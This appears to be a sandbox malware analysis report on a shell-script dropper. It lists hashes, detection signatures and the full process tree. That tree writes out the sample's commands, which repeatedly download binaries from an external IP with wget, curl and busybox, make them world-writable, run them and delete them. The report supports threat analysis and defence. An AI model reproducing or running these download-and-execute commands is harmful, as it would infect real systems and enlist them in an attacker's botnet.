Analysis
-
max time kernel
71s -
max time network
100s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
18/10/2024, 01:59
Static task
static1
Behavioral task
behavioral1
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
-
Size
10KB
-
MD5
d08f4f01c6ec9c67ead46ab98f031a55
-
SHA1
cac804b670bc7011aff98353a06d5906917e496a
-
SHA256
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514
-
SHA512
be5c70e0361500fe82048f5f3cc74bd6019fa75dc8edd3d43bdc5cf875e01e8b9a0f7922e67c42ea1a96e8821f8997c3b73c2f019b571a3ca202dc155e6bbbc7
-
SSDEEP
192:JKto885QciICt1xQYUHgw6AtXj89F6UnrPCJpBrPCJpM21xBA885QcozXj89FWY3:JKG885QciICt1xOUnrPCJpBrPCJpM21M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh1⤵PID:725
-
/bin/rm/bin/rm bins.sh2⤵PID:728
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:733
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:753
-
-
/bin/chmodchmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:759
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:761
-
-
/bin/chmodchmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:764
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:765
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:772
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:781
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:783
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:799
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:824
-
-
/bin/chmodchmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:830
-
-
/bin/chmodchmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:840
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:855
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:872
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:878
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:887
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:890
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:891
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:893
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:896
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:897
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:899
-
-
/bin/chmodchmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:902
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:903
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:905
-
-
/bin/chmodchmod 777 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a./FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:908
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:909
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:911
-
-
/bin/chmodchmod 777 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP./rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:914
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:915
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:917
-
-
/bin/chmodchmod 777 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP./rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:923
-
-
/bin/chmodchmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:929
-
-
/bin/chmodchmod 777 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a./FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:932
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:933
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:935
-
-
/bin/chmodchmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:938
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:939
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:941
-
-
/bin/chmodchmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:944
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:945
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:947
-
-
/bin/chmodchmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:950
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:951
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:953
-
-
/bin/chmodchmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:956
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:957
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:959
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:962
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:963
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:965
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:968
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:969
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:971
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:974
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:975
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:977
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:980
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:981
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:983
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:984
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:986
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:987
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:988
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:989
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:992
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:993
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:995
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:998
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97